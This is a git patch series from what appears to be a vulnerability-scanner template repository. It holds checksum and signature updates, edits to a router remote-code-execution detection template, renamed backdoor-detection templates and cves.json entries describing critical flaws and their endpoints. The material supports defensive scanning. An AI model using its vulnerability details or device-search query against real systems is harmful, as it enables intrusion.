-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:d9e084b608873fab462532369a3595d802c8bc62 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:c4a2d0a6d2f16b4e0e8d941ebb91b2672fb76572 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:4e63ffde0f1b54be5de4ce1ebc3620a1205fec17 +http/technologies/wordpress/plugins/under-construction-page.yaml:9358ed0f4d0194183a9fe42fb87f53d81d995ab0 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f -http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd -http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 -http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 -http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:dd0efb45f91521e93192b445821a549ff0ee0533 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee -http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba -http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 -http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 -http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 -http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/updraftplus.yaml:bbdb8997d8287b0cf6ab3efa7a624f572bd71b53 +http/technologies/wordpress/plugins/use-any-font.yaml:05d1ca04b977c10fcad82b450c0acd4fefc9d7a0 +http/technologies/wordpress/plugins/user-role-editor.yaml:c10fc4323694ff50aa82d6835d3b1d5789eea9c1 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:45019550e554d274a8c8aefa213bbb8f6551e659 +http/technologies/wordpress/plugins/w3-total-cache.yaml:8144ccc62bb23635a42ca843711d181efee2a006 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:87e59d15ca0729b95f00df5136e718e811cd82d3 +http/technologies/wordpress/plugins/webp-express.yaml:a74cfb74b0f00e49da9ba99be5a0d11a830b1013 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:422798c6210811ad29233af5d814a04642587ec5 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:bf82396698dc84db2ccd72fbe3848748283a3717 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:e9d252c9a771091207e58df09621d53dab1bd856 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:9eb475bbcf18f3c54352cd359fa541fcca9639af +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:ff36f1b5ce9276f3299839a15d3633e1541097ea +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:6a85abae8c9b29cf131c85a70bf53c0a12b68fe4 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d8e2dd330c703df4380fe915c72b0568c385f19f +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:3bc661af472214bc203fffa96e683564afb1a8a7 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:b03ffe3e2b8fb8bba419a9e6f7c2edc2d332c68c +http/technologies/wordpress/plugins/woocommerce-services.yaml:6a6e18cfc85fd8345cd5cac8202e549b82b074ec +http/technologies/wordpress/plugins/woocommerce.yaml:858a5e7ac72875ffccb1ec7e9c12b49aeb5c1700 +http/technologies/wordpress/plugins/wordfence.yaml:36a1eb073254face2acea4adb9a66cbbc33fc385 +http/technologies/wordpress/plugins/wordpress-importer.yaml:e8cdb78819fe2a8f6290529839a711717d92e7fe +http/technologies/wordpress/plugins/wordpress-seo.yaml:b3dc534c0d96b2e17b590a1956cef829d08b9890 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 -http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a -http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 -http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded -http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 -http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 -http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 -http/technologies/wordpress/plugins/wp-seopress.yaml:b7fcb27f3c6d85f16295a55a48ecd693b65a51ca -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 -http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245 -http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 -http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f -http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 -http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 -http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb +http/technologies/wordpress/plugins/worker.yaml:e13d6c2c1b9fa56ba7942c2d70530bdb8e16ae46 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:2db83f23af8f32ad154ddf61c8a63d4420a4cf8e +http/technologies/wordpress/plugins/wp-file-manager.yaml:3c57d1ea0a120e33ef0b42e009cdf43a12fd260a +http/technologies/wordpress/plugins/wp-google-maps.yaml:805376e24f870551aed1dde5167b17220883594d +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:5cedfab5bf1a79b756026502f3af8575d46902f2 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:09355893649a9d8e6a5244d992a5815c2bd58653 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:0ea37ee399e0f05c668008e62efffa155d132f1d +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:347970d7f3b412a76f12f9e9c39709ae6e8b8275 +http/technologies/wordpress/plugins/wp-optimize.yaml:4ec5073ec536b860e8e17456cac813c92040e0ed +http/technologies/wordpress/plugins/wp-pagenavi.yaml:505a46fb2beec2316a7dfe8e07eedcb2133630ce +http/technologies/wordpress/plugins/wp-reset.yaml:e3404a20a51e3ba8ea925c992a7584ed33f1eae2 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:90b60cd984f850bdaa9497e929e415dcc02d8b8b +http/technologies/wordpress/plugins/wp-rollback.yaml:33258d5ad22f35b88b468083165ce3a21a257a4e +http/technologies/wordpress/plugins/wp-seopress.yaml:b5ee71fea5abcd0a22b33248430d29c3734fe16e +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:c155a32945fbb5c8542f549291862ac033e676f9 +http/technologies/wordpress/plugins/wp-smushit.yaml:91e79174bf04883af70959be716fd0ada36e6e08 +http/technologies/wordpress/plugins/wp-statistics.yaml:f8c7ccf56d1b551a98328896e77031ae904b57ab +http/technologies/wordpress/plugins/wp-super-cache.yaml:e630a1b6d79fd4f071661794841e2eddec44d3fe +http/technologies/wordpress/plugins/wp-user-avatar.yaml:51665e9c141bd286d76e691460ad4de0349481b4 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:cd947bed2948970ae225dfff8cf3e6d095844db6 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:38104d9a3e83b5735a8c6b0e4023071a20c4ca03 +http/technologies/wordpress/plugins/wpforms-lite.yaml:4cc04c7a7c8fa70b7fdd16ac9b25242d55f0de18 +http/technologies/wordpress/plugins/wps-hide-login.yaml:bcce630e43720ed229b9fa709d509040293743ce +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c643aa481e4f1b7a874facecf6d47dcfdb64cd29 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:f0b86d6e3b502ad7243fde4077efe438135ac8d5 http/technologies/wordpress-detect.yaml:937cc05d463b4e9d17c09fba39056fdbdb187056 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63 @@ -7517,7 +7517,7 @@ ssl/tls-version.yaml:07fa612fd325ec70b698e4a4e1c0d6e7a5a399bc ssl/untrusted-root-certificate.yaml:867f13cbcd5d5a3d8e1c25051b362bd33063d471 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:46ec6c5c3b480cbb1050ef960171df4c5d7e6ecd +templates-checksum.txt:2b6428151a52df66756557b54dd82242540bdf49 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b5ab823c8ea14a763b59aafbe8a87551c3eb513a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 09:45:45 +0000 Subject: [PATCH 13/36] Auto Template Signing [Fri Nov 3 09:45:45 UTC 2023] :robot: --- http/cves/2023/CVE-2023-22518.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index 3f8ca1a764..4e02d9b9d8 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -55,4 +55,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and -# digest: 4a0a00473045022074611cf8360af402eab4224903570e50569a0a115df2b5cbe092341e10b75748022100ea16e1b28f542368626bb141260ba18a0359147d652f99f0b26b4e89c79bf7dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022017ac81b9e9803195ee8e14168360734959becf13b2890ae2efdeeba3c96097fe02200149d740d0191d0ee440b9756daae69a1a3c1dd7bafbaff1d3eab9e648885f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From be142b7fa9d435edb9b54c14dc58dc126d8263ce Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 3 Nov 2023 16:01:16 +0530 Subject: [PATCH 14/36] Update CVE-2023-33629.yaml --- http/cves/2023/CVE-2023-33629.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index df27b2b498..7b2491eb00 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -11,12 +11,12 @@ info: - https://hackmd.io/@0dayResearch/r1UjggZfh metadata: max-request: 1 - fofa-query: app="H3C-Ent-Router" verified: true + fofa-query: app="H3C-Ent-Router" tags: cve,cve2023,router,rce,h3c variables: - filename: "{{to_lower(rand_text_alpha(5))}}" + filename: "{{to_lower(rand_text_alpha(7))}}" http: - raw: @@ -36,5 +36,5 @@ http: - status_code_1 == 302 - contains(body_1, 'do_cmd.asp') - status_code_2 == 200 - - contains(body_2, 'www') && contains(body_2, 'www_multi') + - contains_all(body_2, 'www', 'www_multi') condition: and From f6d4a0556a8dc9a38d95237c862c3bb07d013f22 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Fri, 3 Nov 2023 16:18:03 +0530 Subject: [PATCH 15/36] Update backdoor templates path --- http/vulnerabilities/{other => backdoor}/antsword-backdoor.yaml | 0 http/vulnerabilities/{other => backdoor}/fatpipe-backdoor.yaml | 0 .../{other => backdoor}/kevinlab-bems-backdoor.yaml | 0 .../{other => backdoor}/kevinlab-hems-backdoor.yaml | 0 http/vulnerabilities/{other => backdoor}/maccmsv10-backdoor.yaml | 0 .../{other => backdoor}/php-zerodium-backdoor-rce.yaml | 0 6 files changed, 0 insertions(+), 0 deletions(-) rename http/vulnerabilities/{other => backdoor}/antsword-backdoor.yaml (100%) rename http/vulnerabilities/{other => backdoor}/fatpipe-backdoor.yaml (100%) rename http/vulnerabilities/{other => backdoor}/kevinlab-bems-backdoor.yaml (100%) rename http/vulnerabilities/{other => backdoor}/kevinlab-hems-backdoor.yaml (100%) rename http/vulnerabilities/{other => backdoor}/maccmsv10-backdoor.yaml (100%) rename http/vulnerabilities/{other => backdoor}/php-zerodium-backdoor-rce.yaml (100%) diff --git a/http/vulnerabilities/other/antsword-backdoor.yaml b/http/vulnerabilities/backdoor/antsword-backdoor.yaml similarity index 100% rename from http/vulnerabilities/other/antsword-backdoor.yaml rename to http/vulnerabilities/backdoor/antsword-backdoor.yaml diff --git a/http/vulnerabilities/other/fatpipe-backdoor.yaml b/http/vulnerabilities/backdoor/fatpipe-backdoor.yaml similarity index 100% rename from http/vulnerabilities/other/fatpipe-backdoor.yaml rename to http/vulnerabilities/backdoor/fatpipe-backdoor.yaml diff --git a/http/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml similarity index 100% rename from http/vulnerabilities/other/kevinlab-bems-backdoor.yaml rename to http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml diff --git a/http/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml similarity index 100% rename from http/vulnerabilities/other/kevinlab-hems-backdoor.yaml rename to http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml diff --git a/http/vulnerabilities/other/maccmsv10-backdoor.yaml b/http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml similarity index 100% rename from http/vulnerabilities/other/maccmsv10-backdoor.yaml rename to http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml diff --git a/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml similarity index 100% rename from http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml rename to http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml From 78e94153dbd323bfa9d45a00751363c136a734af Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 10:50:13 +0000 Subject: [PATCH 16/36] Auto Generated New Template Addition List [Fri Nov 3 10:50:13 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3c2d71f492..7398ff8454 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2023/CVE-2023-20198.yaml http/cves/2023/CVE-2023-22518.yaml +http/cves/2023/CVE-2023-33629.yaml http/cves/2023/CVE-2023-4169.yaml http/cves/2023/CVE-2023-43795.yaml http/cves/2023/CVE-2023-4415.yaml From 84de5e4beb71e2d1d423a4bb3071c8682555d111 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 3 Nov 2023 10:50:16 +0000 Subject: [PATCH 17/36] Auto Generated cves.json [Fri Nov 3 10:50:16 UTC 2023] :robot: --- cves.json | 5 ++++- cves.json-checksum.txt | 2 +- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cves.json b/cves.json index dc0ed1d602..dc9c451657 100644 --- a/cves.json +++ b/cves.json @@ -1986,6 +1986,7 @@ {"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"} {"ID":"CVE-2023-22480","Info":{"Name":"KubeOperator Foreground `kubeconfig` - File Download","Severity":"critical","Description":"KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22480.yaml"} {"ID":"CVE-2023-22515","Info":{"Name":"Atlassian Confluence - Privilege Escalation","Severity":"critical","Description":"Atlassian Confluence Data Center and Server contains a privilege escalation vulnerability that allows an attacker to create unauthorized Confluence administrator accounts and access Confluence.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22515.yaml"} +{"ID":"CVE-2023-22518","Info":{"Name":"Atlassian Confluence Server - Improper Authorization","Severity":"critical","Description":"All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-22518.yaml"} {"ID":"CVE-2023-2252","Info":{"Name":"Directorist \u003c 7.5.4 - Local File Inclusion","Severity":"medium","Description":"Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2252.yaml"} {"ID":"CVE-2023-22620","Info":{"Name":"SecurePoint UTM 12.x Session ID Leak","Severity":"high","Description":"An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22620.yaml"} {"ID":"CVE-2023-2272","Info":{"Name":"Tiempo.com \u003c= 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2272.yaml"} @@ -2086,6 +2087,7 @@ {"ID":"CVE-2023-33510","Info":{"Name":"Jeecg P3 Biz Chat - Local File Inclusion","Severity":"high","Description":"Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33510.yaml"} {"ID":"CVE-2023-33568","Info":{"Name":"Dolibarr Unauthenticated Contacts Database Theft","Severity":"high","Description":"An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-33568.yaml"} {"ID":"CVE-2023-33584","Info":{"Name":"Enrollment System Project v1.0 - SQL Injection Authentication Bypass","Severity":"critical","Description":"Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33584.yaml"} +{"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"critical","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} {"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} @@ -2169,13 +2171,14 @@ {"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"} {"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"} {"ID":"CVE-2023-4168","Info":{"Name":"Adlisting Classified Ads 2.14.0 - Information Disclosure","Severity":"high","Description":"Information disclosure issue in the redirect responses, When accessing any page on the website, Sensitive data, such as API keys, server keys, and app IDs, is being exposed in the body of these redirects.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4168.yaml"} -{"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"} +{"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"} {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-43261","Info":{"Name":"Milesight Routers - Information Disclosure","Severity":"high","Description":"A critical security vulnerability has been identified in Milesight Industrial Cellular Routers, compromising the security of sensitive credentials and permitting unauthorized access. This vulnerability stems from a misconfiguration that results in directory listing being enabled on the router systems, rendering log files publicly accessible. These log files, while containing sensitive information such as admin and other user passwords (encrypted as a security measure), can be exploited by attackers via the router's web interface. The presence of a hardcoded AES secret key and initialization vector (IV) in the JavaScript code further exacerbates the situation, facilitating the decryption of these passwords. This chain of vulnerabilities allows malicious actors to gain unauthorized access to the router.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43261.yaml"} +{"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"} 